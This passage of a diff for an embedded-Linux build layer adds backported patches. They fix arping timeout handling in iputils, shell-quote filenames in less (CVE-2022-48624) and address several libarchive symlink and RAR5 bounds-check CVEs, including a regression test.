index 0000000000..3b8a8244da
--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
@@ -0,0 +1,94 @@
+From 60a27c76174c0ae23bdafde2bad4fdd18a44a7ea Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 7 Mar 2020 22:03:21 +0000
+Subject: [PATCH] arping: use additional timerfd to control when timeout
+ happens
+
+Trying to determine timeout by adding up interval values is pointlessly
+complicating. With separate timer everything just works.
+
+Addresses: https://github.com/iputils/iputils/issues/259
+Fixes: 1df5350bdc952b14901fde356b17b78c2bcd4cff
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/e594ca52afde89746b7d79c875fe9d6aea1850ac]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 29 ++++++++++++++++++++++++++---
+ 1 file changed, 26 insertions(+), 3 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 61db3a6..7284351 100644
+--- a/arping.c
++++ b/arping.c
+@@ -670,6 +670,7 @@ static int event_loop(struct run_state *ctl)
+ enum {
+ POLLFD_SIGNAL = 0,
+ POLLFD_TIMER,
++ POLLFD_TIMEOUT,
+ POLLFD_SOCKET,
+ POLLFD_COUNT
+ };
+@@ -686,6 +687,13 @@ static int event_loop(struct run_state *ctl)
+ .it_value.tv_sec = ctl->interval,
+ .it_value.tv_nsec = 0
+ };
++ int timeoutfd;
++ struct itimerspec timeoutfd_vals = {
++ .it_interval.tv_sec = ctl->timeout,
++ .it_interval.tv_nsec = 0,
++ .it_value.tv_sec = ctl->timeout,
++ .it_value.tv_nsec = 0
++ };
+ uint64_t exp, total_expires = 1;
+
+ unsigned char packet[4096];
+@@ -709,7 +717,7 @@ static int event_loop(struct run_state *ctl)
+ pfds[POLLFD_SIGNAL].fd = sfd;
+ pfds[POLLFD_SIGNAL].events = POLLIN | POLLERR | POLLHUP;
+
+- /* timerfd */
++ /* interval timerfd */
+ tfd = timerfd_create(CLOCK_MONOTONIC, 0);
+ if (tfd == -1) {
+ error(0, errno, "timerfd_create failed");
+@@ -722,6 +730,19 @@ static int event_loop(struct run_state *ctl)
+ pfds[POLLFD_TIMER].fd = tfd;
+ pfds[POLLFD_TIMER].events = POLLIN | POLLERR | POLLHUP;
+
++ /* timeout timerfd */
++ timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);
++ if (tfd == -1) {
++ error(0, errno, "timerfd_create failed");
++ return 1;
++ }
++ if (timerfd_settime(timeoutfd, 0, &timeoutfd_vals, NULL)) {
++ error(0, errno, "timerfd_settime failed");
++ return 1;
++ }
++ pfds[POLLFD_TIMEOUT].fd = timeoutfd;
++ pfds[POLLFD_TIMEOUT].events = POLLIN | POLLERR | POLLHUP;
++
+ /* socket */
+ pfds[POLLFD_SOCKET].fd = ctl->socketfd;
+ pfds[POLLFD_SOCKET].events = POLLIN | POLLERR | POLLHUP;
+@@ -764,13 +785,15 @@ static int event_loop(struct run_state *ctl)
+ continue;
+ }
+ total_expires += exp;
+- if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
++ if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
+ exit_loop = 1;
+ continue;
+ }
+ send_pack(ctl);
+ break;
++ case POLLFD_TIMEOUT:
++ exit_loop = 1;
++ break;
+ case POLLFD_SOCKET:
+ if ((s =
+ recvfrom(ctl->socketfd, packet, sizeof(packet), 0,
+--
+2.18.4
+
diff --git a/meta/recipes-extended/iputils/iputils_s20190709.bb b/meta/recipes-extended/iputils/iputils_s20190709.bb
index 545f3d5e87..a715d0a37b 100644
--- a/meta/recipes-extended/iputils/iputils_s20190709.bb
+++ b/meta/recipes-extended/iputils/iputils_s20190709.bb
@@ -10,11 +10,17 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390"
DEPENDS = "gnutls"
-SRC_URI = "git://github.com/iputils/iputils \
+SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \
file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \
file://0001-ninfod-fix-systemd-Documentation-url-error.patch \
file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \
file://0001-iputils-Initialize-libgcrypt.patch \
+ file://0001-arping-revert-partially-fix-sent-vs-received-package.patch \
+ file://0002-arping-fix-f-quit-on-first-reply-regression.patch \
+ file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \
+ file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \
+ file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \
+ file://0001-arping-make-update-neighbours-work-again.patch \
"
SRCREV = "13e00847176aa23683d68fce1d17ffb523510946"
diff --git a/meta/recipes-extended/less/less/CVE-2022-48624.patch b/meta/recipes-extended/less/less/CVE-2022-48624.patch
new file mode 100644
index 0000000000..409730bd4f
--- /dev/null
+++ b/meta/recipes-extended/less/less/CVE-2022-48624.patch
@@ -0,0 +1,41 @@
+From c6ac6de49698be84d264a0c4c0c40bb870b10144 Mon Sep 17 00:00:00 2001
+From: Mark Nudelman <markn@greenwoodsoftware.com>
+Date: Sat, 25 Jun 2022 11:54:43 -0700
+Subject: [PATCH] Shell-quote filenames when invoking LESSCLOSE.
+
+Upstream-Status: Backport [https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144]
+CVE: CVE-2022-48624
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ filename.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/filename.c b/filename.c
+index 5824e385..dff20c08 100644
+--- a/filename.c
++++ b/filename.c
+@@ -972,6 +972,8 @@ close_altfile(altfilename, filename)
+ {
+ #if HAVE_POPEN
+ char *lessclose;
++ char *qfilename;
++ char *qaltfilename;
+ FILE *fd;
+ char *cmd;
+ int len;
+@@ -986,9 +988,13 @@ close_altfile(altfilename, filename)
+ error("LESSCLOSE ignored; must contain no more than 2 %%s", NULL_PARG);
+ return;
+ }
+- len = (int) (strlen(lessclose) + strlen(filename) + strlen(altfilename) + 2);
++ qfilename = shell_quote(filename);
++ qaltfilename = shell_quote(altfilename);
++ len = (int) (strlen(lessclose) + strlen(qfilename) + strlen(qaltfilename) + 2);
+ cmd = (char *) ecalloc(len, sizeof(char));
+- SNPRINTF2(cmd, len, lessclose, filename, altfilename);
++ SNPRINTF2(cmd, len, lessclose, qfilename, qaltfilename);
++ free(qaltfilename);
++ free(qfilename);
+ fd = shellcmd(cmd);
+ free(cmd);
+ if (fd != NULL)
diff --git a/meta/recipes-extended/less/less_551.bb b/meta/recipes-extended/less/less_551.bb
index a818c68fc7..401f40bed5 100644
--- a/meta/recipes-extended/less/less_551.bb
+++ b/meta/recipes-extended/less/less_551.bb
@@ -26,6 +26,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
DEPENDS = "ncurses"
SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \
+ file://CVE-2022-48624.patch \
"
SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819"
diff --git a/meta/recipes-extended/libaio/libaio_0.3.111.bb b/meta/recipes-extended/libaio/libaio_0.3.111.bb
index 8e1cd349a0..309ae53bfb 100644
--- a/meta/recipes-extended/libaio/libaio_0.3.111.bb
+++ b/meta/recipes-extended/libaio/libaio_0.3.111.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499"
-SRC_URI = "git://pagure.io/libaio.git;protocol=https \
+SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \
file://00_arches.patch \
file://destdir.patch \
file://libaio_fix_for_mips_syscalls.patch \
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
new file mode 100644
index 0000000000..555c7a47f7
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
@@ -0,0 +1,183 @@
+Description: Fix handling of symbolic link ACLs
+ Published as CVE-2021-23177
+Origin: upstream, https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad
+Bug-Debian: https://bugs.debian.org/1001986
+Author: Martin Matuska <martin@matuska.org>
+Last-Updated: 2021-12-20
+
+CVE: CVE-2021-23177
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_disk_acl_freebsd.c
++++ b/libarchive/archive_disk_acl_freebsd.c
+@@ -319,7 +319,7 @@
+
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ int acl_type = 0;
+@@ -364,6 +364,13 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+ acl = acl_init(entries);
+ if (acl == (acl_t)NULL) {
+ archive_set_error(a, errno,
+@@ -542,7 +549,10 @@
+ else if (acl_set_link_np(name, acl_type, acl) != 0)
+ #else
+ /* FreeBSD older than 8.0 */
+- else if (acl_set_file(name, acl_type, acl) != 0)
++ else if (S_ISLNK(mode)) {
++ /* acl_set_file() follows symbolic links, skip */
++ ret = ARCHIVE_OK;
++ } else if (acl_set_file(name, acl_type, acl) != 0)
+ #endif
+ {
+ if (errno == EOPNOTSUPP) {
+@@ -677,14 +687,14 @@
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ if (ret != ARCHIVE_OK)
+ return (ret);
+ }
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+
+ /* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -693,7 +703,7 @@
+ #if ARCHIVE_ACL_FREEBSD_NFS4
+ else if ((archive_acl_types(abstract_acl) &
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ }
+ #endif
+--- a/libarchive/archive_disk_acl_linux.c
++++ b/libarchive/archive_disk_acl_linux.c
+@@ -343,6 +343,11 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support RichACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
+ richacl = richacl_alloc(entries);
+ if (richacl == NULL) {
+ archive_set_error(a, errno,
+@@ -455,7 +460,7 @@
+ #if ARCHIVE_ACL_LIBACL
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ int acl_type = 0;
+@@ -488,6 +493,18 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Linux does not support ACLs on symbolic links */
++ return (ARCHIVE_OK);
++ }
++
++ if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++ errno = EINVAL;
++ archive_set_error(a, errno,
++ "Cannot set default ACL on non-directory");
++ return (ARCHIVE_WARN);
++ }
++
+ acl = acl_init(entries);
+ if (acl == (acl_t)NULL) {
+ archive_set_error(a, errno,
+@@ -727,14 +744,14 @@
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ if (ret != ARCHIVE_OK)
+ return (ret);
+ }
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+ }
+ #endif /* ARCHIVE_ACL_LIBACL */
+--- a/libarchive/archive_disk_acl_sunos.c
++++ b/libarchive/archive_disk_acl_sunos.c
+@@ -443,7 +443,7 @@
+
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+- struct archive_acl *abstract_acl,
++ struct archive_acl *abstract_acl, __LA_MODE_T mode,
+ int ae_requested_type, const char *tname)
+ {
+ aclent_t *aclent;
+@@ -467,7 +467,6 @@
+ if (entries == 0)
+ return (ARCHIVE_OK);
+
+-
+ switch (ae_requested_type) {
+ case ARCHIVE_ENTRY_ACL_TYPE_POSIX1E:
+ cmd = SETACL;
+@@ -492,6 +491,12 @@
+ return (ARCHIVE_FAILED);
+ }
+
++ if (S_ISLNK(mode)) {
++ /* Skip ACLs on symbolic links */
++ ret = ARCHIVE_OK;
++ goto exit_free;
++ }
++
+ e = 0;
+
+ while (archive_acl_next(a, abstract_acl, ae_requested_type, &ae_type,
+@@ -801,7 +806,7 @@
+ if ((archive_acl_types(abstract_acl)
+ & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ /* Solaris writes POSIX.1e access and default ACLs together */
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_POSIX1E, "posix1e");
+
+ /* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -810,7 +815,7 @@
+ #if ARCHIVE_ACL_SUNOS_NFS4
+ else if ((archive_acl_types(abstract_acl) &
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ }
+ #endif
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
new file mode 100644
index 0000000000..c4a2fb612c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
@@ -0,0 +1,23 @@
+Description: Never follow symlinks when setting file flags on Linux
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/e2ad1a2c3064fa9eba6274b3641c4c1beed25c0b
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -3927,7 +3927,8 @@
+
+ /* If we weren't given an fd, open it ourselves. */
+ if (myfd < 0) {
+- myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | O_CLOEXEC);
++ myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY |
++ O_CLOEXEC | O_NOFOLLOW);
+ __archive_ensure_cloexec_flag(myfd);
+ }
+ if (myfd < 0)
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
new file mode 100644
index 0000000000..0dfcd1ac5c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
@@ -0,0 +1,172 @@
+Description: Do not follow symlinks when processing the fixup list
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -556,6 +556,7 @@
+ libarchive/test/test_write_disk.c \
+ libarchive/test/test_write_disk_appledouble.c \
+ libarchive/test/test_write_disk_failures.c \
++ libarchive/test/test_write_disk_fixup.c \
+ libarchive/test/test_write_disk_hardlink.c \
+ libarchive/test/test_write_disk_hfs_compression.c \
+ libarchive/test/test_write_disk_lookup.c \
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -2461,6 +2461,7 @@
+ {
+ struct archive_write_disk *a = (struct archive_write_disk *)_a;
+ struct fixup_entry *next, *p;
++ struct stat st;
+ int fd, ret;
+
+ archive_check_magic(&a->archive, ARCHIVE_WRITE_DISK_MAGIC,
+@@ -2478,6 +2479,20 @@
+ (TODO_TIMES | TODO_MODE_BASE | TODO_ACLS | TODO_FFLAGS)) {
+ fd = open(p->name,
+ O_WRONLY | O_BINARY | O_NOFOLLOW | O_CLOEXEC);
++ if (fd == -1) {
++ /* If we cannot lstat, skip entry */
++ if (lstat(p->name, &st) != 0)
++ goto skip_fixup_entry;
++ /*
++ * If we deal with a symbolic link, mark
++ * it in the fixup mode to ensure no
++ * modifications are made to its target.
++ */
++ if (S_ISLNK(st.st_mode)) {
++ p->mode &= ~S_IFMT;
++ p->mode |= S_IFLNK;
++ }
++ }
+ }
+ if (p->fixup & TODO_TIMES) {
+ set_times(a, fd, p->mode, p->name,
+@@ -2492,7 +2507,12 @@
+ fchmod(fd, p->mode);
+ else
+ #endif
+- chmod(p->name, p->mode);
++#ifdef HAVE_LCHMOD
++ lchmod(p->name, p->mode);
++#else
++ if (!S_ISLNK(p->mode))
++ chmod(p->name, p->mode);
++#endif
+ }
+ if (p->fixup & TODO_ACLS)
+ archive_write_disk_set_acls(&a->archive, fd,
+@@ -2503,6 +2523,7 @@
+ if (p->fixup & TODO_MAC_METADATA)
+ set_mac_metadata(a, p->name, p->mac_metadata,
+ p->mac_metadata_size);
++skip_fixup_entry:
+ next = p->next;
+ archive_acl_clear(&p->acl);
+ free(p->mac_metadata);
+@@ -2643,6 +2664,7 @@
+ fe->next = a->fixup_list;
+ a->fixup_list = fe;
+ fe->fixup = 0;
++ fe->mode = 0;
+ fe->name = strdup(pathname);
+ return (fe);
+ }
+--- a/libarchive/test/CMakeLists.txt
++++ b/libarchive/test/CMakeLists.txt
+@@ -208,6 +208,7 @@
+ test_write_disk.c
+ test_write_disk_appledouble.c
+ test_write_disk_failures.c
++ test_write_disk_fixup.c
+ test_write_disk_hardlink.c
+ test_write_disk_hfs_compression.c
+ test_write_disk_lookup.c
+--- /dev/null
++++ b/libarchive/test/test_write_disk_fixup.c
+@@ -0,0 +1,77 @@
++/*-
++ * Copyright (c) 2021 Martin Matuska
++ * All rights reserved.
++ *
++ * Redistribution and use in source and binary forms, with or without
++ * modification, are permitted provided that the following conditions
++ * are met:
++ * 1. Redistributions of source code must retain the above copyright
++ * notice, this list of conditions and the following disclaimer.
++ * 2. Redistributions in binary form must reproduce the above copyright
++ * notice, this list of conditions and the following disclaimer in the
++ * documentation and/or other materials provided with the distribution.
++ *
++ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR
++ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
++ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
++ * IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
++ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
++ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
++ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
++ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
++ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
++ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
++ */
++#include "test.h"
++
++/*
++ * Test fixup entries don't follow symlinks
++ */
++DEFINE_TEST(test_write_disk_fixup)
++{
++ struct archive *ad;
++ struct archive_entry *ae;
++ int r;
++
++ if (!canSymlink()) {
++ skipping("Symlinks not supported");
++ return;
++ }
++
++ /* Write entries to disk. */
++ assert((ad = archive_write_disk_new()) != NULL);
++
++ /*
++ * Create a file
++ */
++ assertMakeFile("victim", 0600, "a");
++
++ /*
++ * Create a directory and a symlink with the same name
++ */
++
++ /* Directory: dir */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFDIR | 0606);
++ assertEqualIntA(ad, 0, archive_write_header(ad, ae));
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ /* Symbolic Link: dir -> foo */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFLNK | 0777);
++ archive_entry_set_size(ae, 0);
++ archive_entry_copy_symlink(ae, "victim");
++ assertEqualIntA(ad, 0, r = archive_write_header(ad, ae));
++ if (r >= ARCHIVE_WARN)
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ assertEqualInt(ARCHIVE_OK, archive_write_free(ad));
++
++ /* Test the entries on disk. */
++ assertIsSymlink("dir", "victim", 0);
++ assertFileMode("victim", 0600);
++}
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
new file mode 100644
index 0000000000..fca53fc9b6
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
@@ -0,0 +1,321 @@
+From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 09:08:13 +0100
+Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files
+
+Added more range checks in the bit stream reading functions
+(read_bits_16 and read_bits_32) in order to better guard against out of
+memory reads.
+
+This commit contains a test with OSSFuzz sample #30448.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+ Makefile.am | 1 +
+ libarchive/archive_read_support_format_rar5.c | 108 ++++++++++--------
+ libarchive/test/test_read_format_rar5.c | 16 +++
+ ...r5_decode_number_out_of_bounds_read.rar.uu | 10 ++
+ 4 files changed, 89 insertions(+), 46 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\
+ libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \
+ libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
++ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ libarchive/test/test_read_format_raw.bufr.uu \
+ libarchive/test/test_read_format_raw.data.gz.uu \
+ libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive
+ return ret;
+ }
+
+-static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) {
++static int read_bits_32(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint32_t* value)
++{
++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_PROGRAMMER,
++ "Premature end of stream during extraction of data (#1)");
++ return ARCHIVE_FATAL;
++ }
++
+ uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24;
+ bits |= p[rar->bits.in_addr + 1] << 16;
+ bits |= p[rar->bits.in_addr + 2] << 8;
+@@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar
+ return ARCHIVE_OK;
+ }
+
+-static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) {
++static int read_bits_16(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint16_t* value)
++{
++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_PROGRAMMER,
++ "Premature end of stream during extraction of data (#2)");
++ return ARCHIVE_FATAL;
++ }
++
+ int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16;
+ bits |= (int) p[rar->bits.in_addr + 1] << 8;
+ bits |= (int) p[rar->bits.in_addr + 2];
+@@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar,
+ }
+
+ /* n = up to 16 */
+-static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n,
+- int* value)
++static int read_consume_bits(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, int n, int* value)
+ {
+ uint16_t v;
+ int ret, num;
+@@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5
+ return ARCHIVE_FATAL;
+ }
+
+- ret = read_bits_16(rar, p, &v);
++ ret = read_bits_16(a, rar, p, &v);
+ if(ret != ARCHIVE_OK)
+ return ret;
+
+@@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t*
+ static int decode_number(struct archive_read* a, struct decode_table* table,
+ const uint8_t* p, uint16_t* num)
+ {
+- int i, bits, dist;
++ int i, bits, dist, ret;
+ uint16_t bitfield;
+ uint32_t pos;
+ struct rar5* rar = get_context(a);
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) {
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) {
++ return ret;
+ }
+
+ bitfield &= 0xfffe;
+@@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r
+ for(i = 0; i < HUFF_TABLE_SIZE;) {
+ uint16_t num;
+
+- if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) {
+- /* Truncated data, can't continue. */
+- archive_set_error(&a->archive,
+- ARCHIVE_ERRNO_FILE_FORMAT,
+- "Truncated data in huffman tables (#2)");
+- return ARCHIVE_FATAL;
+- }
+-
+ ret = decode_number(a, &rar->cstate.bd, p, &num);
+ if(ret != ARCHIVE_OK) {
+ archive_set_error(&a->archive,
+@@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r
+ /* 16..17: repeat previous code */
+ uint16_t n;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++ return ret;
+
+ if(num == 16) {
+ n >>= 13;
+@@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r
+ /* other codes: fill with zeroes `n` times */
+ uint16_t n;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++ return ret;
+
+ if(num == 18) {
+ n >>= 13;
+@@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc
+ }
+
+ /* Convenience function used during filter processing. */
+-static int parse_filter_data(struct rar5* rar, const uint8_t* p,
+- uint32_t* filter_data)
++static int parse_filter_data(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint32_t* filter_data)
+ {
+- int i, bytes;
++ int i, bytes, ret;
+ uint32_t data = 0;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes)))
++ return ret;
+
+ bytes++;
+
+ for(i = 0; i < bytes; i++) {
+ uint16_t byte;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) {
+- return ARCHIVE_EOF;
